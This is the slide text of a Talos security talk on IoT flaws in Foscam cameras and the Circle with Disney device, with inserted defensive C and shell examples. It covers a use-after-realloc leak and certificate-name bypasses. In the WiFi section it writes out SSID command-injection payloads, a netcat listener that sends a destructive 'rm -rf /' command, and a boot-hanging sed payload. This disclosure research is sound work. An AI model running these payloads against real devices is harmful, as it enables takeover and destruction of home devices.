IOT RCE, a Study with Disney Lilith Wyatt


Lilith Wyatt <(^_^)>
Vulndev Research Engineer

My Team and I

- Research Engineer with the Talos Security and Research Group
- I'm a member of the Vulndev Team
- We reverse, we fuzz, we actually read manuals
- Our goal is to find zero day vulnerabilities in third party products. (But not on Cisco stuff)
- We submit the bugs to make third party software more secure, and by extension, also our customers.
- Signatures for our zero-days get put into all of our products.
- Youngest member on the team (that's my excuse), and I'm super lucky and thankful that I'm able to work with such talented people.

Team Members:
- Yves Younan - Research Manager
- Research Engineers: Aleksandar Nikolich, Ali Rizvi-Santiago, Marcin Noga, Piotr Bania, Tyler Bohan, Cory Duplantis, Lilith Wyatt <('.'<), Claudio Bozzato, Martin Zeiser

Bugs included target vendors such as:
- Microsoft
- Apple
- Oracle
- Adobe
- Google
- IBM, HP, Intel, Lexmark
- 7zip, libarchive, NTP
- Vmware

Special Thanks

A shout out to one team member in particular, Claudio Bozzato, with whom all this Circle research was done. He's one of our embedded device experts, and without him, I probably would have bricked my device twice as many times. He did most of the Foscam bugs, and probably half of the Circle bugs, so I feel sorta bad talking alone up here. Sorta.

The IOT Conundrum (& Cliche)

Since I'm lazy, a quote from ZDNet about a quote from Cisco:

"Globally, devices and connections (including M2M connections, smartphones, connected TVs, etc.) are growing faster than the population, Cisco notes. The report projects that the average number of devices and connections per capita will grow globally from two in 2015 to 3.2 by 2020."
([1] Source: http://www.zdnet.com/article/iot-will-account-for-nearly-half-of-connected-devices-by-2020-cisco-says/)

And if the population ends up being 7.5 Billion as projected by the U.S. Census...
=> 22.4 Billion Projected Devices/Connections (I.e. a few)
([2] Source: https://www.census.gov/population/international/data/idb/worldpopgraph.php)

Okay, so there's a few IOT devices on the internet, and there's going to be a few more. What characterizes a typical IOT device?
- Typically arm/mips 32-bit/64-bit devices running some variant of Linux
- Contains sensors not normally found in desktop computers (e.g. an accelerometer)
- Talks to other devices on the network/internet/local proximity (Bluetooth/Zigbee).

Unfortunately, there's also a few other characteristics inherent in most IOT devices.
- Asynchronous Communications (i.e. controlling the device from anywhere)
- Lack of firmware updates/Outdated firmware
- Autoconfiguration/Ease-of-Setup Mishaps
- Exposed Network Ports
- Buggy Code

#SetItAndForgetIt

Case in point: Internet Chemotherapy - Dr Cyborkian a.k.a. janit0r (https://ghostbin.com/paste/q2vq2)
- Bricker Bot: More than 2 million devices were bricked by a telnet/ssh crawler that logged in using basic and/or factory default credentials.
- Hikvision/Dahua Devices: 1.1 million internet exposed CCTV and cameras followed suit via a variety of authentication bypasses.

Doing it Wrong: Foscam

CVE-2017-2805

CVE-2017-2848, CVE-2017-0327, CVE-2017-2849, CVE-2017-2828, CVE-2017-2850,
CVE-2017-2829, CVE-2017-2851, CVE-2017-2830, CVE-2017-2854, CVE-2017-2855,
CVE-2017-2831, CVE-2017-2856, CVE-2017-2857, CVE-2017-2871, CVE-2017-2832,
CVE-2017-2872, CVE-2017-2841, CVE-2017-2873, CVE-2017-2842, CVE-2017-2877,
CVE-2017-2843, CVE-2017-2878, CVE-2017-2844, CVE-2017-2879, CVE-2017-2845,
CVE-2017-2846, CVE-2017-2847, CVE-2017-2833, CVE-2017-2832

Foscam IP Video Camera:
- WebService CGI Parameter Code Execution Vulnerability
- CGIProxy.fcgi DNS2 Address Configuration Command Injection Vulnerability
- CGIProxy.fcgi Account Creation Command Injection Vulnerability
- CGIProxy.fcgi NTP Server Configuration Command Injection Vulnerability
- CGIProxy.fcgi Account Password Command Injection Vulnerability
- CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability
- CGIProxy.fcgi Message 0x3001 Directory Traversal Vulnerability
- CGIProxy.fcgi Wifi Settings Code Execution Vulnerability
- CGIProxy.fcgi Message 0x3001 Multi-part Form Boundary Code Execution Vulnerability
- webService oray.com DDNS Client Code Execution Vulnerability
- webService 3322.net DDNS Client Code Execution Vulnerability
- CGIProxy.fcgi Query Append Code Execution Vulnerability
- webService dyndns.com DDNS Client Code Execution Vulnerability
- webService 9299.org DDNS Client Code Execution Vulnerability
- Firmware Recovery Unsigned Image Vulnerability
- CGIProxy.fcgi Account Deletion Command Injection Vulnerability
- CGIProxy.fcgi Firmware Upgrade Unsigned Image Vulnerability

- CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability
- CGIProxy.fcgi SoftAP Configuration Command Injection Vulnerability
- CGIProxy.fcgi SMTP Test User Parameter Configuration Command Injection Vulnerability
- devMng Multi-Camera Port 10001 Command 0x0064 Empty AuthResetKey Vulnerability
- CGIProxy.fcgi SMTP Test Password Parameter Configuration Command Injection Vulnerability
- CGIProxy.fcgi logOut Code Execution Vulnerability
- CGIProxy.fcgi SMTP Test Sender Parameter Configuration Command Injection Vulnerability
- UPnP Discovery Code Execution Vulnerability
- CGIProxy.fcgi SMTP Test Command Injection Vulnerability
- CGIProxy.fcgi Gateway Address Configuration Command Injection Vulnerability
- CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability
- CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability (prior "coverage")
- CGIProxy.fcgi Query Parameter Parsing Code Execution Vulnerability

Doing it Right: Amazon Key

CVE List:
- Denial of Service Vuln by Rhino Security Labs (https://www.youtube.com/watch?v=2GSK7cIimFY)

Case Study: Circle With Disney

Quick Overview:
- Allows an administrator/parent to monitor and restrict usage of the other people on the network.
- Has varying levels of restrictions for different age groups.
- Once plugged in/configured for a network, it starts ARP Poisoning every other device on the network in order to monitor and restrict.
- Incompatible with any device/application that uses SSL Cert Pinning (since this thing MITMs SSL traffic too).
- Uses Blue Coat Systems to also filter unknown URL domains (including for VPN connections).

CVE-2017-2864 - Circle with Disney Authentication Bypass Vulnerability
CVE-2017-2917 - Circle with Disney configure.xml Notifications Command Injection Vulnerability
CVE-2017-2865 - Circle with Disney Firmware Update Command Injection Vulnerability
CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability
CVE-2017-2866 - Circle with Disney Backup API Command Injection Vulnerability
CVE-2017-12084 - Circle with Disney Rclient SSH Persistent Backdoor Vulnerability
CVE-2017-2881 - Circle with Disney check_torlist.sh Update Code Execution Vulnerability
CVE-2017-12085 - Circle with Disney Token Routing Vulnerability
CVE-2017-2882 - Circle with Disney check_circleservers Code Execution Vulnerability
CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability
CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability
CVE-2017-2883 - Circle with Disney Database Updater Code Execution Vulnerability
CVE-2017-12096 - Circle with Disney WiFi Security Downgrade Vulnerability
CVE-2017-2884 - Circle with Disney Apid Photo Upload Denial of Service Vulnerability
CVE-2017-2889 - Circle with Disney Apid Server Fork Denial of Service Vulnerability
CVE-2017-2890 - Circle with Disney Restore API Command Injection Vulnerability
CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability
CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability
CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability
CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability

Obligatory Pie Chart/Bug Breakdown
- Command Injection (9)
- Misc. (8)
- String Handling (4)
- Memory Management (2)
Total: 23

But we're not going to cover them all... Just these, since they're interesting (imo):

CVE-2017-12085 - Circle with Disney Token Routing Vulnerability
CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability
CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability
CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability
CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability
CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability
CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability

Use-After-Realloc
CVE-2017-12083 - Circle with Disney Apid Use-Between-Reallocs Information Disclosure Vulnerability

Why Mention it?
Because it is a lesser known type of memory corruption that can lead to the classical Use-After-Free vulnerability that we all know and love.

What is it?
As the name implies, we're allocating memory in the heap, assigning variables to this memory, and then reallocating it after the fact. This can lead to dangling pointers, and UAF conditions.

Quick refresher on x64 Linux Memory Layout

[Diagram: Code, Heap, Shared Libs., Stack, VDSO and Kernel Mem., with address markers 0x0, 0x00007fffffffffff and 0xffffffffffffffff]

Things to note:
- If ASLR is turned on, the addresses of the Stack/Shared libraries are randomized.
- The heap's location seems to only be based on the code (.text) location, which is only randomized when compiled as a PIE binary.
- The stack and the heap grow towards each other.

Quick Overview on Uclibc malloc
https://www.win.tue.nl/~aeb/linux/hh/hh-11.html

[Diagram: Heap; Not yet allocated (but still heap); Not allocated/Not heap (yet) (mmap/mbrk); Shared Libs.; Stack; VDSO]

Things to note:
- Big allocations (>1MB) get mmap'ed into the area before the shared libraries.

Methods:

    void *malloc(size_t size);
        - Allocate a new chunk of memory of designated size.
    void *calloc(size_t nmemb, size_t size);
        - same as malloc, but allocates size*nmemb and clears out the memory allocated.
    void free(void *ptr);
        - de-allocate a given chunk.
    void *realloc(void *ptr, size_t size);
        - re-allocate a given chunk to a desired size.

Back on track, what's this Use-After-Reallocs thing?

    void *realloc(void *ptr, size_t size);
        - re-allocate a given chunk to a desired size.

Things to note:
- If the heap is full, but a small allocation happens, the size of the heap will increase.
- But Big allocations (>1MB) get mmap'ed into the mmap/mbrk area.

Example:

    void *chunk2 = malloc(0x20);
    chunk2 = realloc(chunk2, 0x40);

[Diagram: heap before: Chunk1 (size:0x20), Chunk2 (Size:0x20); heap after: Chunk1 (size:0x20), Chunk2 (Size:0x40); mmap/mbrk area beyond the heap]

For the normal usage of realloc (where both params != NULL), it essentially acts as a:

    if (malloc(new_size) != NULL) { free(old_chunk); }

Things to note:
- realloc(NULL, 0x20) == malloc(0x20)
- realloc(ptr, 0) == free(ptr)

There's no guarantee the pointer passed in is the same one you get back!

Example:

    void *chunk2 = malloc(0x20);
    chunk2 = realloc(chunk2, 0x10000000);

[Diagram: heap before: Chunk1 (size:0x20), Chunk2 (Size:0x20); after: Chunk1 (size:0x20) stays in the heap, Chunk2 (Size:0x10000000) is elsewhere]

There's 2 conditions in which realloc causes the underlying memory buffer to shift.

Example 1:

    void *chunk2 = malloc(0x20);
    chunk2 = realloc(chunk2, 0x10000000);

[Diagram: heap before: Chunk1 (size:0x20), Chunk2 (Size:0x20); after: Chunk1 (size:0x20), Chunk2 (Size:0x10000000)]

Example 2:

    void *chunk2 = malloc(0x20);
    void *chunk3 = malloc(0x30);
    chunk2 = realloc(chunk2, 0x60);

[Diagram: heap before: Chunk1 (size:0x20), Chunk2 (Size:0x20), Chunk3 (size:0x30); after: Chunk1 (size:0x20), Chunk3 (size:0x30), Chunk2 (Size:0x60)]

Which means that all pointers assigned to the buffer need to be updated after the Reallocation, to prevent dangling pointers.

Example:

    void *chunk2 = malloc(0x20);
    char *output_str = (char *)chunk2 + 0x10;
    chunk2 = realloc(chunk2, 0x10000000);

[Diagram: before: Chunk1 (size:0x20), Chunk2 (Size:0x20) with output_str pointing into it; after: Chunk1 (size:0x20), Chunk2 (Size:0x10000000), output_str still pointing at the old location]

And then, it's a classic UAF situation, if you can allocate around the same address.

[Diagram (after realloc): Chunk1 (size:0x20), Attacker chunk (size:0x20) with output_str pointing into it, Chunk2 (Size:0x10000000)]

TL;DR, we could dump database strings via an HTTP request:

    # python get_bodied.py
    [O_O] GOGOGO (Connected to circle...)
    [~_~] S-s-s-sendding!!!?! len: 0x105d
    [o_o] gotta response!
    [O_O] gotta another response!
    4:51 GMT
    Vary: Accept-Encoding, Origin
    Access-Control-Allow-Origin: [email protected]
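The dangling-pointer pattern from the slides, as an added C example (not code from the talk or from the Circle's apid): it keeps an offset instead of a raw pointer and re-derives output_str after realloc(). The struct, function names and sample string are hypothetical, and 4 MiB stands in for the slide's 0x10000000.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical growable buffer (names are this example's, not apid's). */
struct grow_buf {
    char  *base;   /* current start of the allocation */
    size_t cap;    /* current capacity in bytes */
};

/* Grow b to new_cap bytes. On failure the old block is left intact.
 * If moved is non-NULL it reports whether realloc() returned a new address. */
int grow_buf_resize(struct grow_buf *b, size_t new_cap, int *moved)
{
    uintptr_t old_addr = (uintptr_t)b->base;  /* saved as an integer, never dereferenced */
    char *p = realloc(b->base, new_cap);
    if (p == NULL)
        return -1;             /* b->base is still valid; do not overwrite it */
    b->base = p;
    b->cap  = new_cap;
    if (moved != NULL)
        *moved = ((uintptr_t)p != old_addr);
    return 0;
}

/* Debug check: does addr fall inside the buffer as it exists right now? */
int grow_buf_contains(const struct grow_buf *b, uintptr_t addr)
{
    uintptr_t lo = (uintptr_t)b->base;
    return addr >= lo && addr - lo < b->cap;
}

/* Mirrors the slide: chunk2 = malloc(0x20); output_str = chunk2 + 0x10; realloc().
 * Returns 1 when the offset-rebased pointer still reads the original data and
 * the stale address is flagged whenever the block moved; 0 otherwise. */
int realloc_rebase_demo(int *moved_out)
{
    struct grow_buf b = { malloc(0x20), 0x20 };
    void *chunk3;
    size_t out_off = 0x10;      /* keep the offset, not the pointer */
    uintptr_t stale;            /* what a saved `char *output_str` would hold */
    int moved = 0, ok;

    if (b.base == NULL)
        return 0;
    memset(b.base, 0, b.cap);
    strcpy(b.base + out_off, "db-row-string");   /* constructed sample data */
    stale = (uintptr_t)(b.base + out_off);

    chunk3 = malloc(0x30);      /* neighbouring chunk, as in Example 2 */

    /* 4 MiB here instead of the slide's 0x10000000, to stay small. */
    if (grow_buf_resize(&b, (size_t)4 << 20, &moved) != 0) {
        free(chunk3);
        free(b.base);
        return 0;
    }

    /* Correct use: recompute the pointer from the new base. */
    const char *output_str = b.base + out_off;
    ok = strcmp(output_str, "db-row-string") == 0;

    /* If the block moved, the saved address no longer belongs to the buffer. */
    if (moved && grow_buf_contains(&b, stale))
        ok = 0;
    if (!moved && !grow_buf_contains(&b, stale))
        ok = 0;

    if (moved_out != NULL)
        *moved_out = moved;
    free(chunk3);
    free(b.base);
    return ok;
}

int main(void)
{
    int moved = 0;
    int ok = realloc_rebase_demo(&moved);
    printf("rebased read ok=%d, block moved=%d\n", ok, moved);
    return ok ? 0 : 1;
}
```

Whether the block moves depends on the allocator, which is why the code reports it instead of assuming it; the offset-based read is correct in both cases.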

SSL Attribute Parsing
CVE-2017-2911 - Circle with Disney Rclient SSL TLD MITM Vulnerability
CVE-2017-2912 - Circle with Disney Goclient SSL TLD MITM Vulnerability
CVE-2017-2913 - Circle with Disney libbluecoat.so SSL TLD MITM Vulnerability

Quick Intermission

*.meetcircle.com

    char *X509_NAME_oneline(X509_NAME *xname, char *buf, int bsize);

X509_NAME_oneline() prints an ASCII version of the xname parameter to buf. At most bsize bytes will be written. If buf is NULL then a buffer is dynamically allocated and returned, otherwise buf is returned.
e.g. `/C=US/ST=Sad/L=boop/O=<(^_^)>/CN=boopdoop.net`

(TL;DR, never use X509_NAME_oneline)

The Certificate Validation Code:

    .text:00402A4C    jal     X509_NAME_oneline        # We get our oneline buffer...
    .text:00402A54    sw      $v0, 0x38+oneline_buff_malloced($fp)
    .text:00402A58    lw      $a0, 0x38+oneline_buff_malloced($fp)
    .text:00402A5C    lui     $v0, 0x41
    .text:00402A60    addiu   $a1, $v0, (aCn_meetcircle_ - 0x410000)  # "CN=*.meetcircle.com"
    .text:00402A64    jal     strstr                   # And then try to find this str inside of it!
    .text:00402A68    nop
    .text:00402A6C    bnez    $v0, loc_402A94
    .text:00402A70    nop
    .text:00402A74    li      $a0, 3
    .text:00402A78    lui     $v0, 0x41
    .text:00402A7C    addiu   $a1, $v0, (aInvalidCertifi - 0x410000)  # "Invalid certificate\n"

Back to our example from before:

    '/C=US/ST=Sad/L=boop/O=<(^_^)>/CN=boopdoop.net'
    'CN=*.meetcircle.com'

So obviously this would not be a match. But the funny thing about certificates is that there's not many restrictions in generating certificates. The only limiting factor in generating a certificate is if you can get someone to actually sign it.

One Hilarious attack: Create a certificate with another attribute that matches.

    '/C=US/ST=Sad/L=boop/O=CN=*.meetcircle.com/CN=boopdoop.net'
    'CN=*.meetcircle.com'

Unfortunately, the Circle has a hardcoded CA cert check too (Comodo/Entrust), and the certificates signed by them had their other attributes overwritten. [>_<]
Source: https://langui.sh/2016/01/29/x509-name-oneline/
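The strstr() check from the listing above, modelled in C next to a check on decoded attributes, as an added example (not the Circle's code and not OpenSSL itself). render_oneline() is a hypothetical stand-in for the /TYPE=value layout of X509_NAME_oneline(); the subjects are the ones quoted in these slides (including the longer-TLD CN from the slides that follow) plus one constructed matching subject, and the exactly-one-CN rule is this example's policy.

```c
#include <stdio.h>
#include <string.h>

#define PINNED_CN "*.meetcircle.com"
#define COUNT(a) (sizeof(a) / sizeof((a)[0]))

/* One decoded subject attribute, e.g. {"CN", "boopdoop.net"}. */
struct name_attr { const char *type; const char *value; };

static const struct name_attr SUBJ_PLAIN[] = {
    {"C", "US"}, {"ST", "Sad"}, {"L", "boop"}, {"O", "<(^_^)>"}, {"CN", "boopdoop.net"} };
static const struct name_attr SUBJ_ATTR[] = {
    {"C", "US"}, {"ST", "Sad"}, {"L", "boop"}, {"O", "CN=*.meetcircle.com"}, {"CN", "boopdoop.net"} };
static const struct name_attr SUBJ_TLD[] = {
    {"C", "US"}, {"ST", "Sad"}, {"L", "boop"}, {"CN", "<(^_^)>"}, {"CN", "*.meetcircle.company"} };
static const struct name_attr SUBJ_PINNED[] = {   /* constructed for this example */
    {"C", "US"}, {"O", "Example"}, {"CN", "*.meetcircle.com"} };

/* Flatten attributes as "/TYPE=value" with no escaping of '/' or '=' inside
 * values; that loss of structure is what the slides rely on. */
size_t render_oneline(const struct name_attr *attrs, size_t n, char *buf, size_t bsize)
{
    size_t used = 0;
    if (bsize == 0)
        return 0;
    buf[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        int w = snprintf(buf + used, bsize - used, "/%s=%s", attrs[i].type, attrs[i].value);
        if (w < 0 || (size_t)w >= bsize - used) {
            buf[used] = '\0';      /* drop the truncated entry */
            break;
        }
        used += (size_t)w;
    }
    return used;
}

/* The check from the disassembly: substring search over the flattened name. */
int weak_check(const char *oneline)
{
    return strstr(oneline, "CN=" PINNED_CN) != NULL;
}

/* Check on decoded attributes: exactly one CN, and its whole value must
 * equal the pinned name (no prefix or substring matches). */
int strict_check(const struct name_attr *attrs, size_t n)
{
    size_t cn_count = 0;
    int match = 0;
    for (size_t i = 0; i < n; i++) {
        if (strcmp(attrs[i].type, "CN") != 0)
            continue;
        cn_count++;
        match = (strcmp(attrs[i].value, PINNED_CN) == 0);
    }
    return cn_count == 1 && match;
}

/* Bit 0: weak check accepts; bit 1: strict check accepts. */
int compare_checks(const struct name_attr *attrs, size_t n)
{
    char oneline[256];
    render_oneline(attrs, n, oneline, sizeof oneline);
    return weak_check(oneline) | (strict_check(attrs, n) << 1);
}

int main(void)
{
    printf("plain subject:    %d\n", compare_checks(SUBJ_PLAIN, COUNT(SUBJ_PLAIN)));
    printf("needle in O=:     %d\n", compare_checks(SUBJ_ATTR, COUNT(SUBJ_ATTR)));
    printf("longer TLD in CN: %d\n", compare_checks(SUBJ_TLD, COUNT(SUBJ_TLD)));
    printf("pinned subject:   %d\n", compare_checks(SUBJ_PINNED, COUNT(SUBJ_PINNED)));
    return 0;
}
```

With OpenSSL, the structured route is to read entries by NID (X509_NAME_get_index_by_NID) or, for hostname verification, to call X509_check_host, rather than searching the oneline text.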

Hilarious attack #2: (And this is honestly just kind of silly...)

    '/C=US/ST=Sad/L=boop/CN=<(^_^)>/CN=boopdoop.net'
    'CN=*.meetcircle.com'

We've established this already....

    '/C=US/ST=Sad/L=boop/CN=<(^_^)>/OU=CN=*.meetcircle.com'

And no CA is going to sign this...

But what about this? ^_^

    '/C=US/ST=Sad/L=boop/CN=<(^_^)>/CN=*.meetcircle.company'

Hilarious attack #2: TLD Extension Bypasses

    'CN=*.meetcircle.com'

These are all valid domains that will bypass the SSL domain name check, and will also actually be signed by a CA:

    CN=*.meetcircle.computer
    CN=*.meetcircle.company
    CN=*.meetcircle.community

There's generally >= 1 for every common TLD:

    .net    .network
    .org    .organic
    Etc.

I realize these weren't the most sophisticated attacks, so I'm not going to spend too much more time here, but the sensitivity and potentially compromising nature of the data that was flowing over these insecurely implemented connections was definitely no joke (even if the exploits were ^_^).

Wifi SSID Vulnerabilities
CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability
CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability
CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability

Why Mention it?
The attack vectors for the following bugs were all over unauthenticated WIFI wireless communications. (#IoTWarDriving?)

Hopefully this is a fair assessment, but IOT devices are more geared toward casual consumers and not your average techie; they mostly try to use a plug-and-play and zero-configuration setup. In the case of the Circle with Disney, this manifests in the fact that you only need to configure an ESSID and password for the network that the Circle will be connecting to and managing.

- Whenever the Circle gets disconnected from your wireless, it will naturally try to reconnect, as expected.
- But it unfortunately only checks/uses the ESSID and Password for this, not the security options of the Access point.
- So if you happen to be broadcasting another password-less ESSID with the same name as the ESSID that the Circle is connected to, and then also just happen to deauth the Circle from its current network....

Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability - Whenever the Circle gets disconnected from your wireless, it will naturally try to reconnect, as expected. -But it unfortunately only checks/uses the ESSID and Password for this, not the security options of the Access point. -So if you happen to be broadcasting another password-less ESSID with the same name as the ESSID that the Circle is connected to, and then also just happen to deauth the Circle from it's current network.... You get a free Circle on your network! Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability

- And while the previous vulnerability might be a tad boring, if you give a hacker connectivity to an insecure IOT device, theyll probably want a shell too Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 1: -- Clear out the current the SSID name thats configured. $ curl -k "https://${sIP}:4567/api/UPDATE/wifi/ssid?token=${sToken}&value=" -- Configure our own hotspot for the injection: $ cat << 'EOF' > hostapd.conf interface=wlan0 channel=1 ssid2=P"\"\n Encryption: \";`nc *`" EOF $ hostapd -B ./hostapd.conf

https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0422 Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 1: -- force an AP scan, so that ap_list.out will contain the crafted SSID $ curl -k "https://${sIP}:4567/api/SCAN?token=${sToken}" -- So now the /tmp/ap_list.out file contains our SSID: Cell 12 - Address: AB:CD:EF:12:34:56 ESSID: "" Encryption: ";`nc *`" Mode: Master Channel: 6 Signal: -43 dBm Quality: 67/70 Encryption: WPA2 PSK (CCMP) -- Following command will get run after disconnecting/connecting to ethernet

system('/mnt/shares/usr/bin/scripts/restart_wifi.sh %s "%s" "%s" % (channel, security, hidden)) => sh -c /mnt/shares/usr/bin/scripts/restart_wifi.sh "";`nc *`"" "" https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0422 Wifi SSID Vulnerabilities CVE-2017-2915 - Circle with Disney WiFi Restart SSID Parsing Command Injection Vulnerability CVE-2017-12094 - Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability CVE-2017-12095 - Circle with Disney WiFi Insecure Access Point Vulnerability Example 1: -- Since `nc` is running from /tmp/services/configd, theres only 2 files, so `nc *` turns into `nc run supervise`. Apparently for Busybox, this results in a DNS lookup of run, and a connection to tcp port 0. -- make any connection to port 0 be redirected to port 8888 $ iptables -t nat -I PREROUTING -p tcp --dport 0 -j REDIRECT --to-ports 8888 -- listen on port 8888 and send the command to execute on the device $ echo /bin/rm rf /" | nc -nlp 8888 -- unplug and replug the ethernet cable, after a few seconds the command above should be executed => Command Execution.

Example 2: Access Point List Parsing

When initially setting up, the Circle must display wifi SSIDs for it to connect to:

    #!/bin/sh
    ifconfig ra0 up
    iwinfo ra0 scan > /tmp/ap_list.out

`iwinfo` prints a list of Access Points detected by `ra0`; every entry has the following form:

    Cell 01 - Address: 11:22:33:44:55:66
              ESSID: "valid-ssid"
              Mode: Master  Channel: 1
              Signal: -22 dBm  Quality: 70/70
              Encryption: WPA2 PSK (CCMP)

When taking the ap_list.out file and outputting the results, it runs a big scary awk command:

    best_ch=`awk 'BEGIN{max=-1000;} /Channel:/{ch=$4} /Signal/{s=$2+0; if (s>max){max=s; maxch=ch}} END{print maxch}' /tmp/ap_list.out`

So if we broadcast an SSID with hostapd like so:

    ssid2=P"Channel: #Signal"

TL;DR: We can inject a ~16 byte string into the $best_ch var. (32 bytes - len(Channel: #Signal))

The $best_ch var is then used like so:

    sed -i "s/channel=.*/channel=$best_ch/g" /tmp/hostapd.conf

So if we choose an SSID as such:

    ssid2=P"Channel: x /;:x/g;bx #Signal"

the injection creates an infinite loop by defining an "x/g" label in sed, and then by always jumping to it. Which causes the device to get stuck while booting.

https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0446
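A hardened version of the channel-selection step from Example 2, as an added example (not Circle firmware code and not from the Talos report): it runs the slide's awk beside a stricter parser on a constructed scan file, and only a validated channel number reaches sed. The function names, the 1-14 channel range and the fallback channel are assumptions.

```shell
#!/bin/sh
# Added example, not Circle firmware. Constructed scan output: one real AP
# plus one AP whose ESSID is the string from the slide.
sample_scan() {
cat <<'EOF'
Cell 01 - Address: 11:22:33:44:55:66
          ESSID: "valid-ssid"
          Mode: Master  Channel: 1
          Signal: -22 dBm  Quality: 70/70
          Encryption: WPA2 PSK (CCMP)
Cell 02 - Address: AA:BB:CC:DD:EE:FF
          ESSID: "Channel: x /;:x/g;bx #Signal"
          Mode: Master  Channel: 6
          Signal: -60 dBm  Quality: 40/70
          Encryption: none
EOF
}

# The awk program from the slide, unchanged: any line containing "Channel:"
# or "Signal" is parsed, including the attacker-chosen ESSID line.
unsafe_best_channel() {
    awk 'BEGIN{max=-1000;} /Channel:/{ch=$4} /Signal/{s=$2+0; if (s>max){max=s; maxch=ch}} END{print maxch}' "$1"
}

# Hardened: skip ESSID lines, match fields by position, then accept the
# result only if it is a 1-2 digit number in 1..14 (2.4 GHz assumed).
safe_best_channel() {
    _ch=$(awk '
        BEGIN { max = -1000 }
        $1 == "ESSID:" { next }
        $1 == "Mode:" && $3 == "Channel:" { ch = $4 }
        $1 == "Signal:" && $2 ~ /^-?[0-9]+$/ {
            s = $2 + 0
            if (s > max) { max = s; maxch = ch }
        }
        END { print maxch }' "$1")
    case "$_ch" in
        ''|*[!0-9]*|???*) return 1 ;;
    esac
    [ "$_ch" -ge 1 ] && [ "$_ch" -le 14 ] || return 1
    printf '%s\n' "$_ch"
}

# Only a validated integer ever reaches the sed expression.
apply_channel() {   # $1 = scan file, $2 = hostapd.conf
    _best=$(safe_best_channel "$1") || _best=1   # fallback value is an assumption
    sed "s/^channel=.*/channel=$_best/" "$2" > "$2.new" && mv "$2.new" "$2"
}

demo_dir=$(mktemp -d)
sample_scan > "$demo_dir/ap_list.out"
printf 'interface=ra0\nchannel=11\n' > "$demo_dir/hostapd.conf"
echo "slide awk selects: $(unsafe_best_channel "$demo_dir/ap_list.out")"
apply_channel "$demo_dir/ap_list.out" "$demo_dir/hostapd.conf"
grep '^channel=' "$demo_dir/hostapd.conf"
```

The ESSID line wins in the original awk because its second field converts to 0, which is higher than any real (negative) dBm reading.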

Cloud Routing Vulnerability

CVE-2017-12085 - Circle with Disney Token Routing Vulnerability

In case Mom or Dad need to monitor the kids away from home, Circle with Disney has a wonderful system to allow for remote access. (I'm sorry in advance for the quality of the following slides)

[Diagram label: remote.meetcircle.co]

There are a few valid questions to be had at this point though:

- What happened to the home router's natural firewall/NAT?
- How does the cloud know which home to hit?
- How does the father authenticate to the remote server???

And the setup is admittedly a little more complicated...

First things first, how can remote.meetcircle.co even speak to the Circle, from a network perspective?

Well, there's a beacon.

The rclient and goclient services running on the Circle constantly ping out to Meetcircle.co domains.... Which are met with 'Pong' Messages. This is done to maintain a hole through a home router's NAT/Firewall...

[Diagram labels: UDP 'Ping' Messages, UDP 'Pong' Messages, remote.meetcircle.co]

Through which a UDP 'connect' message can be sent.

[Diagram labels: UDP 'Connect' Messages, remote.meetcircle.co]

Proxy output for the beacon (ASCII column of the hex dump, one group per 16-byte row):

    [*.*] Listening on 192.168.11.2:8988
    [$.$] local:udp|remote:udp
    ping2 8CE2DAF1EC 16 id=409de33718 594c3a813fcb21 fe6cfbcb58 tag=e a82d3c3ed9a0402b 53456abcd6a15e8 b8d8671cf5f4c
    [o.o] Sent 111 bytes to remote (45.79.169.242:8988)
    pong 8CE2DAE1EB0 6
    [o.o] Sent 17 bytes to local (192.168.11.2:8988)

And this UDP 'connect' message would prompt an SSL connection to be initiated by the Circle to the remote server. This SSL tunnel could then be used to access a hidden API for remote control of the device, more than just the normal web API.

[Diagram labels: UDP 'Connect' Messages, SSL Connection Initiation, SSL Commands, remote.meetcircle.co]

